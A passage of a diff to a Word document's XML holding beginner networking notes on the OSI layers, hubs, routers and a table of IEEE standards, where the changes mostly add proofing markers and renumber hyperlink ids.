         </w:rPr>
-        <w:t>The services provided by transport layer :</w:t>
-      </w:r>
+        <w:t xml:space="preserve">The services provided by transport </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>layer :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1715,8 +1925,20 @@
           <w:sz w:val="27"/>
           <w:szCs w:val="27"/>
         </w:rPr>
-        <w:t>5. Session Layer (Layer 5) :</w:t>
-      </w:r>
+        <w:t>5. Session Layer (Layer 5</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>) :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1742,8 +1964,18 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:br/>
-        <w:t>The functions of the session layer are :</w:t>
-      </w:r>
+        <w:t xml:space="preserve">The functions of the session layer </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>are :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1790,6 +2022,7 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1800,6 +2033,7 @@
         </w:rPr>
         <w:t>Synchronization :</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1830,8 +2064,20 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Dialog Controller :</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Dialog </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Controller :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1942,8 +2188,19 @@
           <w:szCs w:val="24"/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>SCENARIO:</w:t>
-      </w:r>
+        <w:t>SCENARIO</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2048,8 +2305,20 @@
           <w:sz w:val="27"/>
           <w:szCs w:val="27"/>
         </w:rPr>
-        <w:t>6. Presentation Layer (Layer 6) :</w:t>
-      </w:r>
+        <w:t>6. Presentation Layer (Layer 6</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>) :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2093,8 +2362,18 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:br/>
-        <w:t>The functions of the presentation layer are :</w:t>
-      </w:r>
+        <w:t xml:space="preserve">The functions of the presentation layer </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>are :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2109,6 +2388,7 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2119,6 +2399,7 @@
         </w:rPr>
         <w:t>Translation :</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2149,8 +2430,20 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Encryption/ Decryption :</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Encryption/ </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Decryption :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2222,8 +2515,20 @@
           <w:sz w:val="27"/>
           <w:szCs w:val="27"/>
         </w:rPr>
-        <w:t>7. Application Layer (Layer 7) :</w:t>
-      </w:r>
+        <w:t>7. Application Layer (Layer 7</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>) :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2249,8 +2554,18 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:br/>
-        <w:t>Ex: Application – Browsers, Skype Messenger etc.</w:t>
-      </w:r>
+        <w:t>Ex: Application – Browsers, Skype Messenger etc</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2352,8 +2667,18 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>The functions of the Application layer are :</w:t>
-      </w:r>
+        <w:t xml:space="preserve">The functions of the Application layer </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>are :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2494,7 +2819,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Don’t look at these layers as some layers in network, These layers actually describe or brief how the network works.</w:t>
+        <w:t xml:space="preserve">Don’t look at these layers as some layers in network, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>These</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> layers actually describe or brief how the network works.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2518,7 +2851,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>The most important thing look at these layers physically in real world with an example , only then you will be understanding each layers.</w:t>
+        <w:t xml:space="preserve">The most important thing look at these layers physically in real world with an </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>example ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> only then you will be understanding each layers.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2632,7 +2973,15 @@
         <w:t>Hubs:</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Hubs are general network devices ( These are mostly out of use at present condition) that just connect all point of the network. When a packet is sent the packet is duplicated and sent to all the point over the network. This is huge waste of bandwidth or baud.</w:t>
+        <w:t xml:space="preserve"> Hubs are general network devices </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>( These</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> are mostly out of use at present condition) that just connect all point of the network. When a packet is sent the packet is duplicated and sent to all the point over the network. This is huge waste of bandwidth or baud.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2654,7 +3003,23 @@
         <w:t xml:space="preserve">Router: </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> While the above two are intra networking devices this is a inter networking device. This is a layer 3 device. The routers are responsible for path definition , packet forwarding / filtering(Just separation of packets,  It does not discard them) and Internetworking.</w:t>
+        <w:t xml:space="preserve"> While the above two are intra networking devices this is </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>a inter</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> networking device. This is a layer 3 device. The routers are responsible for path </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>definition ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> packet forwarding / filtering(Just separation of packets,  It does not discard them) and Internetworking.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -3530,13 +3895,23 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>Fiber-optic connection</w:t>
+              <w:t>Fiber</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>-optic connection</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3718,18 +4093,37 @@
               </w:rPr>
               <w:t>Wireless Networking – "</w:t>
             </w:r>
-            <w:hyperlink r:id="rId32" w:tooltip="WiFi" w:history="1">
-              <w:r>
-                <w:rPr>
-                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                  <w:color w:val="0000FF"/>
-                  <w:sz w:val="24"/>
-                  <w:szCs w:val="24"/>
-                  <w:u w:val="single"/>
-                </w:rPr>
-                <w:t>WiFi</w:t>
-              </w:r>
-            </w:hyperlink>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:instrText xml:space="preserve"> HYPERLINK "https://en.wikipedia.org/wiki/WiFi" \o "WiFi" </w:instrText>
+            </w:r>
+            <w:r>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="0000FF"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>WiFi</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="0000FF"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3761,7 +4155,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId33" w:tooltip="IEEE 802.12" w:history="1">
+            <w:hyperlink r:id="rId32" w:tooltip="IEEE 802.12" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3821,7 +4215,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId34" w:tooltip="IEEE 802.14" w:history="1">
+            <w:hyperlink r:id="rId33" w:tooltip="IEEE 802.14" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3881,7 +4275,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId35" w:tooltip="IEEE 802.15.2" w:history="1">
+            <w:hyperlink r:id="rId34" w:tooltip="IEEE 802.15.2" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3941,7 +4335,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId36" w:tooltip="IEEE 802.15.4" w:history="1">
+            <w:hyperlink r:id="rId35" w:tooltip="IEEE 802.15.4" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3978,7 +4372,7 @@
               </w:rPr>
               <w:t>Wireless Sensor/Control Networks – "</w:t>
             </w:r>
-            <w:hyperlink r:id="rId37" w:tooltip="ZigBee" w:history="1">
+            <w:hyperlink r:id="rId36" w:tooltip="ZigBee" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4021,7 +4415,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId38" w:tooltip="IEEE 802.15.6" w:history="1">
+            <w:hyperlink r:id="rId37" w:tooltip="IEEE 802.15.6" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4058,7 +4452,7 @@
               </w:rPr>
               <w:t xml:space="preserve">Wireless </w:t>
             </w:r>
-            <w:hyperlink r:id="rId39" w:tooltip="Body Area Network" w:history="1">
+            <w:hyperlink r:id="rId38" w:tooltip="Body Area Network" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4070,7 +4464,7 @@
                 <w:t>Body Area Network</w:t>
               </w:r>
             </w:hyperlink>
-            <w:hyperlink r:id="rId40" w:anchor="cite_note-15" w:history="1">
+            <w:hyperlink r:id="rId39" w:anchor="cite_note-15" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4091,7 +4485,7 @@
               </w:rPr>
               <w:t xml:space="preserve"> (BAN) – (e.g. </w:t>
             </w:r>
-            <w:hyperlink r:id="rId41" w:tooltip="Bluetooth low energy" w:history="1">
+            <w:hyperlink r:id="rId40" w:tooltip="Bluetooth low energy" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4134,7 +4528,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId42" w:tooltip="IEEE 802.16" w:history="1">
+            <w:hyperlink r:id="rId41" w:tooltip="IEEE 802.16" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4171,7 +4565,7 @@
               </w:rPr>
               <w:t>Wireless Networking – "</w:t>
             </w:r>
-            <w:hyperlink r:id="rId43" w:tooltip="WiMAX" w:history="1">
+            <w:hyperlink r:id="rId42" w:tooltip="WiMAX" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4214,7 +4608,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId44" w:tooltip="IEEE 802.24 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId43" w:tooltip="IEEE 802.24 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4274,7 +4668,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId45" w:tooltip="IEEE 828 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId44" w:tooltip="IEEE 828 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4334,7 +4728,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId46" w:tooltip="IEEE 829" w:history="1">
+            <w:hyperlink r:id="rId45" w:tooltip="IEEE 829" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4394,7 +4788,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId47" w:tooltip="IEEE 830" w:history="1">
+            <w:hyperlink r:id="rId46" w:tooltip="IEEE 830" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4454,7 +4848,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId48" w:tooltip="IEEE 896" w:history="1">
+            <w:hyperlink r:id="rId47" w:tooltip="IEEE 896" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4483,6 +4877,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4491,6 +4886,7 @@
               </w:rPr>
               <w:t>Futurebus</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -4514,7 +4910,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId49" w:tooltip="IEEE 1003" w:history="1">
+            <w:hyperlink r:id="rId48" w:tooltip="IEEE 1003" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4543,7 +4939,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId50" w:tooltip="Unix" w:history="1">
+            <w:hyperlink r:id="rId49" w:tooltip="Unix" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4586,7 +4982,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId51" w:tooltip="IEEE 1016" w:history="1">
+            <w:hyperlink r:id="rId50" w:tooltip="IEEE 1016" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4646,7 +5042,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId52" w:tooltip="IEEE 1028 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId51" w:tooltip="IEEE 1028 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4706,7 +5102,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId53" w:tooltip="IEEE 1044.1 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId52" w:tooltip="IEEE 1044.1 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4766,7 +5162,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId54" w:tooltip="IEEE 1059 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId53" w:tooltip="IEEE 1059 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4826,7 +5222,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId55" w:tooltip="IEEE 1073" w:history="1">
+            <w:hyperlink r:id="rId54" w:tooltip="IEEE 1073" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4886,7 +5282,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId56" w:tooltip="IEEE 1074 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId55" w:tooltip="IEEE 1074 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4946,7 +5342,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId57" w:tooltip="IEEE 1076" w:history="1">
+            <w:hyperlink r:id="rId56" w:tooltip="IEEE 1076" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4975,7 +5371,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId58" w:tooltip="VHDL" w:history="1">
+            <w:hyperlink r:id="rId57" w:tooltip="VHDL" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4995,7 +5391,7 @@
               </w:rPr>
               <w:t xml:space="preserve"> – </w:t>
             </w:r>
-            <w:hyperlink r:id="rId59" w:tooltip="VHSIC" w:history="1">
+            <w:hyperlink r:id="rId58" w:tooltip="VHSIC" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5015,7 +5411,7 @@
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:hyperlink r:id="rId60" w:tooltip="Hardware Description Language" w:history="1">
+            <w:hyperlink r:id="rId59" w:tooltip="Hardware Description Language" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5050,7 +5446,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId61" w:tooltip="JTAG" w:history="1">
+            <w:hyperlink r:id="rId60" w:tooltip="JTAG" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5110,7 +5506,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId62" w:tooltip="JTAG" w:history="1">
+            <w:hyperlink r:id="rId61" w:tooltip="JTAG" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5139,7 +5535,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId63" w:tooltip="AC-JTAG (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId62" w:tooltip="AC-JTAG (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5174,7 +5570,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId64" w:tooltip="IEEE 1180 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId63" w:tooltip="IEEE 1180 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5203,7 +5599,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId65" w:tooltip="Discrete cosine transform" w:history="1">
+            <w:hyperlink r:id="rId64" w:tooltip="Discrete cosine transform" w:history="1">
               <w:r>
                 <w:rPr>
